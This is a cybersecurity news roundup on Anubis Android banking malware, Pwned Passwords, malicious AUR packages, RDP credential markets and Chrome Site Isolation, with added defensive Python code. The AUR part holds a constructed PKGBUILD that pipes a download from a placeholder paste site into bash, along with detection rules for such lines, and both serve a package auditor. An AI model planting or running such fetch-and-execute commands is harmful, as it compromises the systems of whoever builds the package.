Anubis Malware Re-Emerges Yet Again; Hackers Distributing It via Google Play Store

The Anubis banking malware has resurfaced, this time with threat actors placing downloader apps for it on the Google Play Store in order to steal login credentials for banking apps, e-wallets and payment cards.

Attackers keep finding new ways to slip past Google Play's security checks and to distribute malware through ordinary-looking Android apps. The apps themselves are only the first stage of an "infection routine": once installed, they fetch the BankBot Anubis banking Trojan from a command-and-control (C&C) server.

Users are infected when they download and install these malicious apps from Google Play. Although Google inspects every app uploaded to the store, the criminals use increasingly elaborate obfuscation to evade detection.

Researchers at IBM X-Force recently discovered a new set of downloaders on the Play Store that are linked to the Anubis banking malware. The campaign involves at least 10 malicious downloaders disguised as assorted apps, and the downloaders distributed through these apps are known to fetch more than 1,000 samples from the criminals' command-and-control (C&C) servers.

“In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.”

The criminals upload apps that look like live, legitimate services and lure users into installing them by presenting them as something useful; the victim trusts the app and grants it what it asks for.

The researchers also found that these malicious Play Store apps, which pose as legitimate ones, mostly target Turkish-speaking users: the downloader apps in this particular campaign were built to address Turkish users only, with a handful of different botnets and configurations.

The apps were uploaded under a range of categories, from online shopping to financial services and even an automotive app.

According to X-Force's analysis, the ongoing changes to the downloader app suggest that it is actively maintained, another sign that it is either a commodity sold to cybercriminals or the tool of a specific group focused on defrauding Turkish mobile banking users.

Once the malicious downloader is installed on the victim's Android device, it fetches BankBot Anubis from one of its C&C servers. Anubis then pushes the user to grant it Accessibility Service permission by posing as an app called "Google Protect".

With that accessibility permission the malware can read what is typed into and displayed by other apps, so it effectively acts as a keylogger and captures the victim's credentials from the infected device.

BankBot Anubis is also known to target users in many other countries, among them Australia, Austria, Azerbaijan, Belarus, Brazil, Canada, China, the Czech Republic, France, Georgia, Germany, Hong Kong, India, Ireland, Israel, Japan, Kazakhstan, Spain, Taiwan, Turkey, the U.K. and the U.S.

Pwned Passwords adds 15.6 million hacked passwords; full database available for download on the "haveibeenpwned" website

Most of us have wondered whether our email address or password has ever been exposed in a breach, but few people know how to check.

The website 'Have I Been Pwned' lets users check whether their email address or password has appeared in a known data breach. It also shows how many times the address or password has turned up.

Over the years the site has released successive versions of its Pwned Passwords database, each larger than the last. The first version, in August 2017, contained 320 million passwords from breaches; within six months that had grown to 500 million. The third version, released on July 13, adds a further 15.6 million passwords that have been exposed in past data breaches.

Any password in this database should be treated as compromised: it has been exposed in at least one breach, and attackers routinely feed such lists into credential-stuffing and password-guessing attacks. If your password appears on the list, change it as soon as possible.

The website explains that the email-address search and the password search are separate features: "When email addresses from a data breach are loaded into the site, no corresponding passwords are loaded with them. Separately to the pwned address search feature, the Pwned Passwords service allows you to check if an individual password has previously been seen in a data breach. No password is stored next to any personally identifiable data (such as an email address) and every freely available password is SHA-1 hashed."

The entire database is freely available for download from the website via two links, a torrent and a direct download served by Cloudflare. Both contain only SHA-1 hashes of the passwords, one hash per line together with the number of times it was seen, never the plaintext.

To check an email address, visit the site and type the address into the search box. Below the box the site reports how many breached sites and how many pastes the address appeared in, and lists each breach along with its year.

To check a password, open the Pwned Passwords search and type the password. Below the search box you will see how many times that password has appeared in data breaches. The search hashes the password in the browser and sends only a short prefix of the hash to the server, so the password itself is never transmitted. The same page also offers the download of the complete hashed list.
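As an added example (not code from the Have I Been Pwned site), the following Python shows both ways of using the data described above offline: scanning the downloaded "hash:count" list for a password's SHA-1, and the client side of the prefix search, where only the first five hex characters of the hash are sent and the returned suffixes are matched locally. The sample list and the sample range response are constructed for this example; the hashes are the real SHA-1 digests of "password", "123456" and "qwerty", but the counts are made up.

```python
import hashlib
from typing import Iterable, Tuple

# Constructed excerpt of the downloadable Pwned Passwords list. Each line is
# "<uppercase SHA-1 hex>:<number of times seen>". Counts are invented.
SAMPLE_PWNED_LIST = """\
5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8:3645804
7C4A8D09CA3762AF61E59520943DC26494F8941B:2834024
B1B3773A05C0ED0176787A4F1574FF0075F7521E:1030
"""

# Constructed response for a range query on prefix "5BAA6": each line is the
# remaining 35 hex characters of a hash plus its count (real API uses CRLF).
SAMPLE_RANGE_RESPONSE = "\r\n".join([
    "0" * 34 + "1:2",
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3645804",
    "F" * 34 + "E:1",
])


def sha1_upper(password: str) -> str:
    """SHA-1 of the UTF-8 encoded password as uppercase hex, the list's format."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def breach_count(password: str, lines: Iterable[str]) -> int:
    """How many times the password appears in the list (0 if absent).

    The list is scanned line by line, so the same function works on the
    multi-gigabyte download opened as a file, not only on the sample string.
    """
    target = sha1_upper(password)
    for line in lines:
        digest, sep, count = line.strip().partition(":")
        if sep and digest.upper() == target:
            return int(count)
    return 0


def range_query_parts(password: str) -> Tuple[str, str]:
    """Split the hash into the 5-character prefix that is sent to the service
    and the 35-character suffix that stays on the client (k-anonymity)."""
    digest = sha1_upper(password)
    return digest[:5], digest[5:]


def count_from_range_response(password: str, response_text: str) -> int:
    """Match the local suffix against the suffixes returned for the prefix.

    The response for prefix P is the list of all hashes starting with P, so the
    server learns only that the password hashes to one of hundreds of values.
    """
    _, suffix = range_query_parts(password)
    for line in response_text.splitlines():
        candidate, sep, count = line.strip().partition(":")
        if sep and candidate.upper() == suffix:
            return int(count)
    return 0


if __name__ == "__main__":
    for pw in ("password", "123456", "correct horse battery staple"):
        print(pw, "seen", breach_count(pw, SAMPLE_PWNED_LIST.splitlines()), "times")
    print("range match for 'password':",
          count_from_range_response("password", SAMPLE_RANGE_RESPONSE))
```

To use this against the real download, open the downloaded file and pass it to breach_count directly (for example `with open(path) as f: breach_count(pw, f)`); for the online check, fetch `https://api.pwnedpasswords.com/range/` followed by the prefix from range_query_parts and hand the body to count_from_range_response. Neither path ever sends the plaintext or the full hash anywhere.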

Malware found in Arch Linux AUR Repository

Malware was found in at least three packages on the Arch User Repository (AUR), the community repository of user-submitted packages for Arch Linux. The malicious code was removed promptly once the AUR team intervened. The incident was possible because the AUR lets any user adopt a package that its original maintainer has abandoned.

That is how the malware got in: on Saturday a user named "xeactor" took over an orphaned package called "acroread", a PDF viewer, and added malicious code to its build script.

The Git commit shows that "xeactor" added a line that downloaded a script named "~x" from a lightweight paste service (one that lets users share small text snippets) and executed it. That script in turn fetched and ran a second file named "~u", and installed a systemd unit and timer so that "~u" would be run again every 360 seconds.

The purpose of the second file (~u) was to collect information about each infected system, including the date and time, the machine ID, package-manager details, CPU information and the output of the "uname -a" and "systemctl list-units" commands, and to post it to a new Pastebin paste using the attacker's own Pastebin API key.
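The practical defence against this kind of change is to read the PKGBUILD diff before rebuilding a package. As an added example (not code from Arch or the AUR), the Python below audits a PKGBUILD for the pattern described above: an explicit curl/wget in the build functions (makepkg downloads source=() entries itself, so none is needed), a download piped into a shell, a systemd unit written at build time, and a disabled checksum. Both PKGBUILD texts are constructed for this example; the URLs are placeholders, not the addresses from the real commit.

```python
import re
from typing import List, Tuple

# Constructed PKGBUILD modelled on the malicious pattern: package() fetches a
# script from a paste site and pipes it straight into bash. Placeholder URLs.
SUSPECT_PKGBUILD = """\
pkgname=acroread
pkgver=9.5.5
pkgrel=8
source=("https://files.invalid/acroread-${pkgver}.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir"
  install -Dm755 acroread "$pkgdir/usr/bin/acroread"
  curl -s https://paste.invalid/~x | bash -
}
"""

# Constructed clean counterpart: same package, no network access at build time
# and a real checksum (value invented for the example).
CLEAN_PKGBUILD = """\
pkgname=acroread
pkgver=9.5.5
pkgrel=7
source=("https://files.invalid/acroread-${pkgver}.tar.gz")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

package() {
  cd "$srcdir"
  install -Dm755 acroread "$pkgdir/usr/bin/acroread"
}
"""

# (description, pattern) pairs applied to each non-comment line.
RULES = [
    ("explicit network fetch in build script", re.compile(r"\b(curl|wget)\b")),
    ("download piped into a shell", re.compile(r"\|\s*(ba|z|da)?sh\b")),
    ("systemd unit or timer written by the build",
     re.compile(r"/(usr/lib|etc)/systemd/system/")),
    # SKIP is legitimate for VCS sources, but for a tarball it disables
    # integrity checking, so it deserves a look.
    ("checksum verification disabled with SKIP",
     re.compile(r"\b(md5|sha\d+)sums=\(.*'SKIP'")),
]


def audit_pkgbuild(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule description, line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]          # ignore shell comments
        for description, pattern in RULES:
            if pattern.search(code):
                findings.append((lineno, description, line.strip()))
    return findings


def audit_update(old: str, new: str) -> List[Tuple[int, str, str]]:
    """Audit only lines that are new relative to a PKGBUILD you already
    reviewed, which is the check to run before rebuilding on an upgrade."""
    reviewed = {line.strip() for line in old.splitlines()}
    return [f for f in audit_pkgbuild(new) if f[2] not in reviewed]


if __name__ == "__main__":
    for lineno, why, line in audit_update(CLEAN_PKGBUILD, SUSPECT_PKGBUILD):
        print(f"line {lineno}: {why}: {line}")
```

Run it against the PKGBUILD in the package's AUR git clone (the previous revision is available through `git show HEAD~1:PKGBUILD`). A clean report is not proof of safety, since a build can still run arbitrary shell in prepare() or build(), but a hit on any of these rules should stop the build until the maintainer explains it.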

The AUR team also found similar code in other packages:

▬ acroread 9.5.5-8

▬ balz 1.20-3

▬ minergate 8.1-2

The malicious changes were reverted and xeactor's account was suspended. AUR packages are build scripts submitted by users and are not vetted by the Arch developers, which is why Arch tells users to read a PKGBUILD before building it. This is not the only case this year of malicious code turning up in a community-maintained package repository.

No other malicious actions were observed, so the acroread package was not damaging users' systems; it was merely collecting data, presumably in preparation for a later stage.

Although the code posed no serious threat to infected machines, the scripts contained no self-update mechanism, so delivering anything more harmful would have required "xeactor" to push another package update; the data collection looks like the groundwork for exactly that.

Criminals selling RDP login credentials for government systems for $10

Security researchers have traced a group of criminals running dark web marketplaces where login credentials for sensitive systems are offered for sale, a serious threat for the wider infosec community.

In the course of the research, McAfee's security experts found that these criminals sell access to many organisations, including government departments, for as little as $10 per system.

The credentials are believed to come from government and private systems exposed through Microsoft's Remote Desktop Protocol (RDP), in many cases protected by nothing stronger than a weak, guessable password. Each such finding gave the researchers another thread to follow and widened the study.

The researchers confirm a steep rise in criminal use of RDP: it gives an attacker a full interactive session on the remote machine, and because it is also what legitimate administrators use, malicious sessions are easy to hide among normal ones.

Most striking, the researchers found RDP access to the automated security systems of a major airport on sale for around $10; how that access was obtained still needs investigation.

More revelations keep surfacing about these dark web markets and the RDP shops connected to them.

The shops offer access to thousands of compromised systems running everything from Windows XP to Windows 10. More disturbing still, many of the systems on sale belong to government bodies and well-known private organisations.

A large share of them are in the medical and healthcare sector. Alongside RDP access, the shops sell credit card data and social security numbers, and with administrator-level RDP credentials an attacker simply logs in to the target as an admin.

They can then carry out malicious activity with little risk and are rarely caught. The researchers' view is that these schemes will not die down as long as weakly secured RDP endpoints remain exposed; what is needed, they say, is system administration that manages remote access deliberately, with strong credentials and RDP kept off the open internet, instead of leaving it to chance.
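Weak RDP passwords are typically harvested by guessing them from the internet, and that activity leaves a trail in the Windows Security log. As an added example (not code from McAfee or the article), the Python below runs a simple detection over constructed Security log events: it groups failed logons (event 4625) by source address, flags any address that produced a burst of failures against RDP logon types inside a short window, and reports whether a successful logon (event 4624) from the same address followed, the signature of a guessed credential. Field layout, thresholds and all sample data are this example's own assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Logon types under which RDP appears in the Windows Security log:
# 10 = RemoteInteractive. With Network Level Authentication enabled, failed RDP
# pre-authentication is instead logged with logon type 3 (Network), which also
# covers SMB and other network logons, so a production rule would pair type 3
# with network telemetry for port 3389 to cut false positives.
RDP_LOGON_TYPES = {10, 3}

# Constructed sample events: (timestamp, event id, logon type, source IP, user).
# 4625 = failed logon, 4624 = successful logon. Not real log data.
Event = Tuple[str, int, int, str, str]
SAMPLE_EVENTS: List[Event] = [
    ("2018-07-15T02:00:01", 4625, 10, "203.0.113.7", "administrator"),
    ("2018-07-15T02:00:09", 4625, 10, "203.0.113.7", "admin"),
    ("2018-07-15T02:00:17", 4625, 10, "203.0.113.7", "user"),
    ("2018-07-15T02:00:26", 4625, 10, "203.0.113.7", "test"),
    ("2018-07-15T02:00:34", 4625, 10, "203.0.113.7", "jsmith"),
    ("2018-07-15T02:00:41", 4625, 10, "203.0.113.7", "jsmith"),
    ("2018-07-15T02:00:52", 4624, 10, "203.0.113.7", "jsmith"),   # guessed it
    ("2018-07-15T09:12:00", 4625, 10, "198.51.100.2", "jsmith"),  # one typo
    ("2018-07-15T09:12:30", 4624, 10, "198.51.100.2", "jsmith"),
    ("2018-07-15T11:00:00", 4625, 2, "-", "svc_backup"),          # local logon
]


def detect_rdp_guessing(events: List[Event], threshold: int = 5,
                        window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Alert on source IPs with >= threshold RDP logon failures inside window.

    Each alert records the failure count, the distinct user names tried (many
    names from one IP is password spraying) and any users that logged on
    successfully from that IP after the burst.
    """
    by_ip: Dict[str, List[Tuple[datetime, int, str]]] = defaultdict(list)
    for ts, event_id, logon_type, ip, user in events:
        if logon_type in RDP_LOGON_TYPES and ip != "-":
            by_ip[ip].append((datetime.fromisoformat(ts), event_id, user))

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [e for e in evs if e[1] == 4625]
        # Sliding window: densest run of failures for this address.
        best, start = None, 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            count = end - start + 1
            if best is None or count > best[0]:
                best = (count, start, end)
        if best is None or best[0] < threshold:
            continue
        count, s, e = best
        last_failure = failures[e][0]
        alerts.append({
            "ip": ip,
            "first_failure": failures[s][0].isoformat(),
            "last_failure": last_failure.isoformat(),
            "failures": count,
            "distinct_users": sorted({u for _, _, u in failures[s:e + 1]}),
            "success_after": [u for t, eid, u in evs
                              if eid == 4624 and t >= last_failure],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_guessing(SAMPLE_EVENTS):
        print(alert)
```

Feed it records exported from the Security log (the same fields are available from Get-WinEvent or a SIEM). An alert with a non-empty success_after list is the case to treat as a compromised account: the credential has just been sold or is about to be.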

Google Chrome to get revamped soon

The world's most used web browser, Google Chrome, is being reworked to make it faster and more secure.

Google announced this week that it has shipped a robust security mitigation against the Spectre vulnerabilities, which its own researchers helped bring to light at the beginning of 2018.

Chrome 67 introduced Site Isolation, which puts pages from different websites into separate renderer processes so that a Spectre attack running on one site cannot read another site's data out of its own process. The drawback is higher memory use, roughly 10 to 13 per cent more overall, which is felt most on devices with 4 GB of RAM or less.

However, the company has promised to keep reducing the cost of Site Isolation. "Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure," added Charlie Reis, a software engineer on the Chrome team.

According to the company, Site Isolation is now enabled for 99 per cent of Chrome users on Windows, Mac, Linux and Chrome OS; the remaining 1 per cent are held back as a control group so Google can "monitor and improve performance".

It will be interesting to see how users react once Chrome 68 ships later this month. From Chrome 68 onwards, users can confirm whether Site Isolation is active by opening chrome://process-internals; that page does not exist in Chrome 67.

"We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes," Reis writes in the blog post. "Stay tuned for an update about this enforcement."
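What Site Isolation actually separates is the site, meaning scheme plus registrable domain (eTLD+1), not the finer-grained origin that the same-origin policy uses, so two subdomains of one site still share a renderer process and therefore share the Spectre-readable address space. As an added example (not Chrome's code), the Python below computes the site and origin of a URL and groups URLs the way renderer processes are assigned. The public-suffix set is a constructed subset; Chrome uses the full Public Suffix List, and a real implementation should too.

```python
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List, enough for this example.
PUBLIC_SUFFIXES = {"com", "org", "net", "uk", "co.uk", "io", "github.io"}


def registrable_domain(host: str) -> str:
    """eTLD+1 of a host: its longest known public suffix plus one more label.

    A host that is itself a public suffix, an IP literal, or a name with no
    known suffix (e.g. localhost) is returned unchanged.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):            # longest suffix is found first
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[max(i - 1, 0):])
    return host.lower()


def site_of(url: str) -> str:
    """The Site Isolation boundary: scheme plus registrable domain."""
    parts = urlsplit(url)
    return f"{parts.scheme.lower()}://{registrable_domain(parts.hostname or '')}"


def origin_of(url: str) -> str:
    """The same-origin-policy boundary: scheme, full host and port."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme.lower())
    return f"{parts.scheme.lower()}://{(parts.hostname or '').lower()}:{port}"


def same_site(a: str, b: str) -> bool:
    return site_of(a) == site_of(b)


def same_origin(a: str, b: str) -> bool:
    return origin_of(a) == origin_of(b)


def process_assignment(urls: List[str]) -> Dict[str, List[str]]:
    """Group URLs by site: with Site Isolation on, each group gets its own
    renderer process, and only URLs in the same group share memory."""
    groups: Dict[str, List[str]] = {}
    for url in urls:
        groups.setdefault(site_of(url), []).append(url)
    return groups


if __name__ == "__main__":
    for site, members in process_assignment([
        "https://a.example.com/mail",
        "https://b.example.com:8443/api",
        "http://example.com/",
        "https://alice.github.io/",
        "https://bob.github.io/",
    ]).items():
        print(site, "->", members)
```

The practical consequence for defenders: an attacker who can run script on any subdomain of your site (a forgotten dev host, a user-content subdomain) sits in the same process as your main application, so Site Isolation does not protect one subdomain from another, which is one more reason to host untrusted content on a separate registrable domain.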